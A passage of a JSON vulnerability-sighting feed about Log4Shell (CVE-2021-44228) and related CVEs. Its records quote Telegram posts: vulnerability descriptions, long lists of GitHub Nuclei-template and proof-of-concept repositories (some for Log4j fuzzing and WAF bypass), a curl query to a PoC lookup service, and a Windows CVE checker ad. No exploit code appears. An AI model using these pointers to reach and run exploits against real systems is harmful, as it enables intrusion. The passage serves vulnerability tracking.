\u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @politicheskie_panchi \u0438 @kz_vzglyd", "creation_timestamp": "2023-08-11T01:57:33.000000Z"}, {"uuid": "83466e98-e137-4a7f-a2b4-e9f2b44e9bb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ctinow/46448", "content": "\u2018Long Live Log4Shell\u2019: CVE-2021-44228 Not Dead Yet\n\nhttps://ift.tt/KYI50TG", "creation_timestamp": "2022-02-04T20:01:19.000000Z"}, {"uuid": "339b9bcd-b699-412b-a67d-9fdd0684b315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/Al5s1pu9DlCNMnH7rJt2q5NFKP_tt6i0TJLpRuR3HfdnDhA", "content": "", "creation_timestamp": "2022-12-05T04:24:48.000000Z"}, {"uuid": "51744152-af5d-4dde-8810-6c2f3d826917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ctinow/43775", "content": "CVE-2021-44228 vulnerability in Apache Log4j library\n\nhttps://ift.tt/3DKBD0h", "creation_timestamp": "2021-12-13T15:16:36.000000Z"}, {"uuid": "b7343232-e297-4cc8-9e0c-1baeb61baafd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ctinow/43773", "content": "CVE-2021-44228 vulnerability in Apache Log4j library\n\nhttps://ift.tt/3DKBD0h", "creation_timestamp": "2021-12-13T15:11:04.000000Z"}, {"uuid": "595241b5-6e1d-4896-8d6f-5bf8176b1c08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ctinow/43742", "content": "Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation\n\nhttps://ift.tt/3IEW0iZ", "creation_timestamp": "2021-12-12T06:31:05.000000Z"}, {"uuid": "98f28f9d-c9e3-4635-a3cd-ce886477e51c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/anwar1213xx/1528", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2021-44228 \u0641\u064a \u0645\u0643\u062a\u0628\u0629 Apache Log4j\n\nhttps://securelist.ru/cve-2021-44228-vulnerability-in-apache-log4j-library/104144/\n\n#My_pride_is_crazy #The_Yemeni_ghost", "creation_timestamp": "2021-12-19T17:48:13.000000Z"}, {"uuid": "65215247-5f04-4c71-b3c2-94f64f2bb3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44224", "type": "seen", "source": "Telegram/Hf_SunJuoYNf_bsQCJ20cuXyI7bzH8EMEXzusn30k3vpXeQ", "content": "", "creation_timestamp": "2024-10-15T10:14:15.000000Z"}, {"uuid": "97396172-ba39-438b-a3db-8cb19b59b821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/B9DqsWvoRexHKKG5MOsYwdCa5qAONPxkXkwsUKHAaW9aAV7K", "content": "", "creation_timestamp": "2024-11-10T11:40:24.000000Z"}, {"uuid": "7fc31577-7f52-4097-b4c6-04ffcb84f4f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/intell137/3", "content": "if you need to find the POC for a specific CVE\n\n1. Just a list of CVEs and links to POCs for them https://raw.githubusercontent.com/tg12/PoC_CVEs/main/cve_links.txt\n\n2. There is also a method: specify the CVE you need in the cve_id parameter (the result in the screenshots cve_id\n\ncurl 'https://poc-in-github.motikan2010.net/api/v1/?cve_id=cve-2021-44228' | jq | grep html_url", "creation_timestamp": "2024-01-31T05:09:50.000000Z"}, {"uuid": "32100b10-19a5-401b-8b38-335fc1d7d5cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/vHTtKQxmAT3f8pPJYMyZLW3MJn_6GFVTdkZIulMbNHlsBg", "content": "", "creation_timestamp": "2023-11-22T10:27:55.000000Z"}, {"uuid": "e964d8e1-684e-4796-96ff-824ad82acf98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1248", "content": "https://github.com/meme-lord/Custom-Nuclei-Templates\nhttps://github.com/Akokonunes/Private-Nuclei-Templates\nhttps://github.com/rafaelwdornelas/my-nuclei-templates\nhttps://github.com/rafaelcaria/Nuclei-Templates\nhttps://github.com/panch0r3d/nuclei-templates\nhttps://github.com/0x727/ObserverWard_0x727\nhttps://github.com/ethicalhackingplayground/erebus-templates\nhttps://github.com/test502git/log4j-fuzz-head-poc\nhttps://github.com/Str1am/my-nuclei-templates\nhttps://github.com/d3sca/Nuclei_Templates\nhttps://github.com/c-sh0/nuclei_templates\nhttps://github.com/glyptho/templatesallnuclei\nhttps://github.com/0xAwali/Virtual-Host\nhttps://github.com/praetorian-inc/chariot-launch-nuclei-templates\nhttps://github.com/brinhosa/brinhosa-nuclei-templates\nhttps://github.com/kh4sh3i/CVE-2022-23131\nhttps://github.com/wr00t/templates\nhttps://github.com/alexrydzak/rydzak-nuclei-templates\nhttps://github.com/adampielak/nuclei-templates\nhttps://github.com/ShangRui-hash/my-nuclei-templates\nhttps://github.com/dk4trin/templates-nuclei\nhttps://github.com/Elsfa7-110/mynuclei-templates\nhttps://github.com/ping-0day/template\nhttps://github.com/wasp76b/nuclei-templates\nhttps://github.com/th3r4id/nuclei-templates\nhttps://github.com/justmumu/SpringShell\nhttps://github.com/trickest/log4j\nhttps://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228\nhttps://github.com/toramanemre/log4j-rce-detect-waf-bypass\nhttps://github.com/blazeinfosec/nuclei-templates\nhttps://github.com/ekinsb/Nuclei-Templates\nhttps://github.com/KeepHowling/all_freaking_nuclei_templates\nhttps://github.com/Odayex/Random-Nuclei-Templates\nhttps://github.com/aels/CVE-2022-37042\nhttps://github.com/tamimhasan404/Open-Source-Nuclei-Templates-Downloader\nhttps://github.com/pentest-dev/Profesional-Nuclei-Templates\nhttps://github.com/badboy-sft/badboy_17-Nuclei-Templates-Collection\nhttps://github.com/NightRang3r/misc_nuclei_templates\nhttps://github.com/ExpLangcn/NucleiTP\nhttps://github.com/0xmaximus/final_freaking_nuclei_templates\nhttps://github.com/Jagomeiister/nuclei-templates\nhttps://github.com/ricardomaia/nuclei-template-generator-for-wordpress-plugins\nhttps://github.com/Lopseg/nuclei-c-templates\nhttps://github.com/sl4x0/NC-Templates\nhttps://github.com/thecyberneh/nuclei-templatess\nhttps://github.com/yarovit-developer/nuclei-templates\nhttps://github.com/cipher387/juicyinfo-nuclei-templates\nhttps://github.com/Kaue-Navarro/Templates-kaue-nuclei\nhttps://github.com/JoshMorrison99/url-based-nuclei-templates\nhttps://github.com/ayadim/Nuclei-bug-hunter\nhttps://github.com/soumya123raj/Nuclei\nhttps://github.com/soapffz/myown-nuclei-poc\nhttps://github.com/zer0yu/Open-PoC\nhttps://github.com/SumedhDawadi/Custom-Nuclei-Template\nhttps://github.com/coldrainh/nuclei-ByMyself\nhttps://github.com/binod235/nuclei-templates-and-reports\nhttps://github.com/mbskter/Masscan2Httpx2Nuclei-Xray\nhttps://github.com/luck-ying/Library-YAML-POC\nhttps://github.com/PedroFerreira97/nuclei_templates\nhttps://github.com/Hunt2behunter/nuclei-templates\nhttps://github.com/mastersir-lab/nuclei-yaml-poc\nhttps://github.com/SirAppSec/nuclei-template-generator-log4j\nhttps://github.com/0xPugazh/my-nuclei-templates\nhttps://github.com/topscoder/nuclei-wordfence-cve\nhttps://github.com/erickfernandox/nuclei-templates\nhttps://github.com/damon-sec/Nuclei-templates-Collection\nhttps://github.com/DoubleTakes/nuclei-templates\nhttps://github.com/ptyspawnbinbash/template-enhancer\nhttps://github.com/Arvinthksrct/alltemplate\nhttps://github.com/srkgupta/cent-nuclei-templates\nhttps://github.com/UltimateSec/ultimaste-nuclei-templates\nhttps://github.com/xinZa1/template\nhttps://github.com/SirBugs/Priv8-Nuclei-Templates\nhttps://github.com/davidfortytwo/GetNucleiTemplates\nhttps://github.com/v3l4r10/Nuclei-Templates\nhttps://github.com/wearetyomsmnv/llm_integrated_nuclei_templates", "creation_timestamp": "2025-04-22T02:52:21.000000Z"}, {"uuid": "890b9294-5fec-4171-b604-892bbb46bee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/270", "content": "\ud83d\uddbc\ufe0f \ud83d\udd04 Moriarty v1.2\n\n\u0427\u0435\u043a\u0435\u0440 CVEs \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 C# \u0434\u043b\u044f \u041e\u0421 \ud83c\udfe0 Windows\n\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nWindows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)\nWindows 11 (Versions: 21H2, 22H1, 22H2, 23H1)\nWindows Server 2016, 2019, 2022\n\n\u0421\u043f\u0438\u0441\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (35):\nMS10-015\nMS10-092\nMS13-053\nMS13-081\nMS14-058\nMS15-051\nMS15-078\nMS16-016\nMS16-032\nMS16-034\nMS16-135\nCVE-2017-7199\nCVE-2019-0836\nCVE-2019-0836\nCVE-2019-1064\nCVE-2019-1130\nCVE-2019-1253\nCVE-2019-1315\nCVE-2019-1385\nCVE-2019-1388\nCVE-2019-1405\nCVE-2020-0668\nCVE-2020-0683\nCVE-2020-0796\nCVE-2020-1013\nCVE-2020-1013\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nCVE-2021-44228\nCVE-2021-36934\nCVE-2022-40140\nCVE-2022-22965\nCVE-2023-36664\n\n1.2 added:\n2023-23397\n2022-34718\n\n\ud83d\udc49 \u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\n\n\u0422\u0430\u043a\u0436\u0435 \u0431\u043e\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u043f\u043e CVE\n\n!poc CVE-2019-1064\n\n\ud83d\udcbb Home\n\n\u0414\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f Visual Studio \u0438 .NET Framework 4.8 Developer Pack\n\n#moriarty #checker #csharp\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-05-03T09:04:40.000000Z"}, {"uuid": "90837c66-ea88-47cf-aa17-354334ab08f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/pt_soft/243", "content": "\ud83d\uddbc\ufe0f Moriarty v1.1\n\n\u0427\u0435\u043a\u0435\u0440 CVEs \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 C# \u0434\u043b\u044f \u041e\u0421 \ud83c\udfe0 Windows\n\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nWindows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)\nWindows 11 (Versions: 21H2, 22H1, 22H2, 23H1)\nWindows Server 2016, 2019, 2022\n\n\u0421\u043f\u0438\u0441\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (35):\nMS10-015\nMS10-092\nMS13-053\nMS13-081\nMS14-058\nMS15-051\nMS15-078\nMS16-016\nMS16-032\nMS16-034\nMS16-135\nCVE-2017-7199\nCVE-2019-0836\nCVE-2019-0836\nCVE-2019-1064\nCVE-2019-1130\nCVE-2019-1253\nCVE-2019-1315\nCVE-2019-1385\nCVE-2019-1388\nCVE-2019-1405\nCVE-2020-0668\nCVE-2020-0683\nCVE-2020-0796\nCVE-2020-1013\nCVE-2020-1013\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nCVE-2021-44228\nCVE-2021-36934\nCVE-2022-40140\nCVE-2022-22965\nCVE-2023-36664\n\n\ud83d\udc49 \u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\n\n\u0422\u0430\u043a\u0436\u0435 \u0431\u043e\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u043f\u043e CVE\n\n!poc CVE-2019-1064\n\n\ud83d\udcbb Home\n\n\u0414\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f Visual Studio \u0438 .NET Framework 4.8 Developer Pack\n\n#moriarty #checker #csharp\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-03-15T08:58:02.000000Z"}, {"uuid": "674d43ff-04a8-4f9d-bc4c-4ac8640a03ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/AGENTZSECURITY/1243", "content": "https://github.com/pikpikcu/nuclei-templates\nhttps://github.com/esetal/nuclei-bb-templates\nhttps://github.com/ARPSyndicate/kenzer-templates\nhttps://github.com/medbsq/ncl\nhttps://github.com/notnotnotveg/nuclei-custom-templates\nhttps://github.com/foulenzer/foulenzer-templates\nhttps://github.com/clarkvoss/Nuclei-Templates\nhttps://github.com/z3bd/nuclei-templates\nhttps://github.com/joanbono/nuclei-templates\nhttps://github.com/peanuth8r/Nuclei_Templates\nhttps://github.com/thebrnwal/Content-Injection-Nuclei-Script\nhttps://github.com/ree4pwn/my-nuclei-templates\nhttps://github.com/im403/nuclei-temp\nhttps://github.com/System00-Security/backflow\nhttps://github.com/geeknik/nuclei-templates-1\nhttps://github.com/geeknik/the-nuclei-templates\nhttps://github.com/optiv/mobile-nuclei-templates\nhttps://github.com/obreinx/nuceli-templates\nhttps://github.com/randomstr1ng/nuclei-sap-templates\nhttps://github.com/CharanRayudu/Custom-Nuclei-Templates\nhttps://github.com/zinminphyo0/KozinTemplates\nhttps://github.com/n1f2c3/mytemplates\nhttps://github.com/kabilan1290/templates\nhttps://github.com/smaranchand/nuclei-templates\nhttps://github.com/Saimonkabir/Nuclei-Templates\nhttps://github.com/yavolo/nuclei-templates\nhttps://github.com/sadnansakin/my-nuclei-templates\nhttps://github.com/5cr1pt/templates\nhttps://github.com/rahulkadavil/nuclei-templates\nhttps://github.com/Nithissh0708/Custom-Nuclei-Templates\nhttps://github.com/shifa123/detections\nhttps://github.com/daffainfo/my-nuclei-templates\nhttps://github.com/javaongsan/nuclei-templates\nhttps://github.com/AshiqurEmon/nuclei_templates.git\nhttps://github.com/ChiaraNRTT96/BountySkill\nhttps://gist.github.com/ResistanceIsUseless/e46848f67706a8aa1205c9d2866bff31\nhttps://gist.github.com/0x240x23elu\nhttps://github.com/NitinYadav00/My-Nuclei-Templates\nhttps://github.com/sharathkramadas/k8s-nuclei-templates\nhttps://github.com/securitytest3r/nuclei_templates_work\nhttps://github.com/MR-pentestGuy/nuclei-templates\nhttps://github.com/thelabda/nuclei-templates\nhttps://github.com/1in9e/my-nuclei-templates\nhttps://github.com/redteambrasil/nuclei-templates\nhttps://github.com/Saptak9983/Nuclei-Template\nhttps://github.com/Harish4948/Nuclei-Templates\nhttps://github.com/R-s0n/Custom_Vuln_Scan_Templates\nhttps://github.com/meme-lord/Custom-Nuclei-Templates\nhttps://github.com/rafaelcaria/Nuclei-Templates\nhttps://github.com/panch0r3d/nuclei-templates\nhttps://github.com/0x727/ObserverWard_0x727\nhttps://github.com/ethicalhackingplayground/erebus-templates\nhttps://github.com/test502git/log4j-fuzz-head-poc\nhttps://github.com/Str1am/my-nuclei-templates\nhttps://github.com/d3sca/Nuclei_Templates\nhttps://github.com/c-sh0/nuclei_templates\nhttps://github.com/glyptho/templatesallnuclei\nhttps://github.com/0xAwali/Virtual-Host\nhttps://github.com/praetorian-inc/chariot-launch-nuclei-templates\nhttps://github.com/brinhosa/brinhosa-nuclei-templates\nhttps://github.com/kh4sh3i/CVE-2022-23131\nhttps://github.com/wr00t/templates\nhttps://github.com/alexrydzak/rydzak-nuclei-templates\nhttps://github.com/adampielak/nuclei-templates\nhttps://github.com/ShangRui-hash/my-nuclei-templates\nhttps://github.com/dk4trin/templates-nuclei\nhttps://github.com/Elsfa7-110/mynuclei-templates\nhttps://github.com/ping-0day/templates\nhttps://github.com/wasp76b/nuclei-templates\nhttps://github.com/th3r4id/nuclei-templates\nhttps://github.com/themastersunil/Nuclei-TamplatesBackup.git\nhttps://github.com/justmumu/SpringShell\nhttps://github.com/trickest/log4j\nhttps://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228\nhttps://github.com/toramanemre/log4j-rce-detect-waf-bypass\nhttps://github.com/blazeinfosec/nuclei-templates\nhttps://github.com/ekinsb/Nuclei-Templates\nhttps://github.com/Charseki/nuclei_templates\nhttps://github.com/testtt3424/nuclei-templates\nhttps://github.com/V0idC0de/dir-listing-iis-test", "creation_timestamp": "2025-04-22T02:52:20.000000Z"}, {"uuid": "8407b298-d567-4cc2-b417-1e2cefa1610f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1252", "content": "https://github.com/mdsabbirkhan/0xPugazh-my-nuclei-templates\nhttps://github.com/mdube99/custom-nuclei-templates\nhttps://github.com/mdube99/nuclei-templates\nhttps://github.com/medbsq/ncl\nhttps://github.com/meme-lord/Custom-Nuclei-Templates\nhttps://github.com/mertugur/nuclei-templates\nhttps://github.com/microphone-mathematics/custom-nuclei-templates\nhttps://github.com/milo2012/nuclei-templates-others\nhttps://github.com/myuyu/nuclei-templates\nhttps://github.com/n1f2c3/mytemplates\nhttps://github.com/narasimha5x5/nuclei-templates\nhttps://github.com/narasimhareddy5x5/nuclei-templates\nhttps://github.com/nicholasaleks/NucleiGPT\nhttps://github.com/nikhilhvr/nuclei-templates\nhttps://github.com/notnotnotveg/nuclei-custom-templates\nhttps://github.com/nullfuzz-pentest/custom-nuclei-templates\nhttps://github.com/numanturle/CVE-2022-41040\nhttps://github.com/nuts7/CVE-2023-27372\nhttps://github.com/obreinx/nuceli-templates\nhttps://github.com/optiv/mobile-nuclei-templates\nhttps://github.com/p0ch4t/nuclei-special-templates\nhttps://github.com/p3n73st3r/Nuclei-Templates\nhttps://github.com/panch0r3d/nuclei-templates\nhttps://github.com/peanuth8r/Nuclei_Templates\nhttps://github.com/pentest-dev/Profesional-Nuclei-Templates\nhttps://github.com/pikpikcu/nuclei-templates\nhttps://github.com/ping-0day/templates\nhttps://github.com/polling-repo-continua/KozinTemplates\nhttps://github.com/praetorian-inc/chariot-launch-nuclei-templates\nhttps://github.com/praetorian-inc/zeroqlik-detect\nhttps://github.com/psc4re/nuclei-templates\nhttps://github.com/ptyspawnbinbash/template-enhancer\nhttps://github.com/qaisarafridi/MY-Nuclei-Templates\nhttps://github.com/r3dcl1ff/Symfony-Fuck\nhttps://github.com/rafaelcaria/Nuclei-Templates\nhttps://github.com/rafaelwdornelas/my-nuclei-templates\nhttps://github.com/rahul-nakum14/Recon\nhttps://github.com/rahulkadavil/nuclei-templates\nhttps://github.com/randomstr1ng/nuclei-sap-templates\nhttps://github.com/redteambrasil/nuclei-templates\nhttps://github.com/ree4pwn/my-nuclei-templates\nhttps://github.com/reewardius/mytemplates-log4shell\nhttps://github.com/reewardius/nuclei-special-templates\nhttps://github.com/reewardius/nuclei-templates\nhttps://github.com/reewardius/nuclei-templates-new\nhttps://github.com/ricardomaia/nuclei-template-generator-for-wordpress-plugins\nhttps://github.com/rutgerhrm/valid8\nhttps://github.com/sadnansakin/my-nuclei-templates\nhttps://github.com/samy1937/mynuclei_templates\nhttps://github.com/schooldropout1337/nuclei-templates\nhttps://github.com/securitytest3r/nuclei_templates_work\nhttps://github.com/sharathkramadas/k8s-nuclei-templates\nhttps://github.com/shifa123/detections\nhttps://github.com/shubham-rooter/Nuclei-custom-templates\nhttps://github.com/sl4x0/NC-Templates\nhttps://github.com/smaranchand/nuclei-templates\nhttps://github.com/soapffz/myown-nuclei-poc\nhttps://github.com/soumya123raj/Nuclei\nhttps://github.com/souzomain/mytemplates\nhttps://github.com/stevemason/nuclei-template-forked-daapd-path-traversal\nhttps://github.com/sudouday/nuclei-templates\nhttps://github.com/sushant-kamble/mynuclei-template\nhttps://github.com/szybnev/nuclei-custom\nhttps://github.com/tamimhasan404/Open-Source-Nuclei-Templates-Downloader\nhttps://github.com/test502git/log4j-fuzz-head-poc\nhttps://github.com/testtt3424/nuclei-templates\nhttps://github.com/th3-r3sistanc3/nuclei-templates\nhttps://github.com/th3r4id/nuclei-templates\nhttps://github.com/thebrnwal/Content-Injection-Nuclei-Script\nhttps://github.com/thecyberneh/nuclei-templatess\nhttps://github.com/thecybertix/Nuclei-templates\nhttps://github.com/thefool45/nuclei-templates\nhttps://github.com/thelabda/nuclei-templates\nhttps://github.com/themoonbaba/private_templates\nhttps://github.com/topscoder/nuclei-wordfence-cve\nhttps://github.com/topscoder/nuclei-zero-day\nhttps://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228", "creation_timestamp": "2025-04-22T02:52:22.000000Z"}, {"uuid": "d3537449-6b06-4eaf-9462-5213b61f6da3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/4393", "content": "#ExploitObserverAlert\n\nCVE-2021-45046\n\nDESCRIPTION: Exploit Observer has 318 entries in 20 file formats related to CVE-2021-45046. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFIRST-EPSS: 0.973630000\nNVD-IS: 6.0\nNVD-ES: 2.2", "creation_timestamp": "2024-04-09T05:20:07.000000Z"}, {"uuid": "e5cced7f-d3c4-4cac-b206-d302c7ea53bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/1951", "content": "#ExploitObserverAlert\n\nCVE-2021-44228\n\nDESCRIPTION: Exploit Observer has 1853 entries related to CVE-2021-44228. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-18T08:58:23.000000Z"}, {"uuid": "48a76121-810b-49d7-ae08-96217d4998f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44227", "type": "seen", "source": "https://t.me/arpsyndicate/1814", "content": "#ExploitObserverAlert\n\nCVE-2021-44227\n\nDESCRIPTION: Exploit Observer has 3 entries related to CVE-2021-44227. In GNU Mailman before 2.1.38, a list member or moderator can get a CSRF token and craft an admin request (using that token) to set a new admin password or make other changes.\n\nFIRST-EPSS: 0.001120000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-16T11:43:04.000000Z"}, {"uuid": "b35a5f40-f4d2-4c10-adcf-a368630f7a7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/1280", "content": "#ExploitObserverAlert\n\nCVE-2021-44228\n\nDESCRIPTION: Exploit Observer has 1853 entries related to CVE-2021-44228. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": 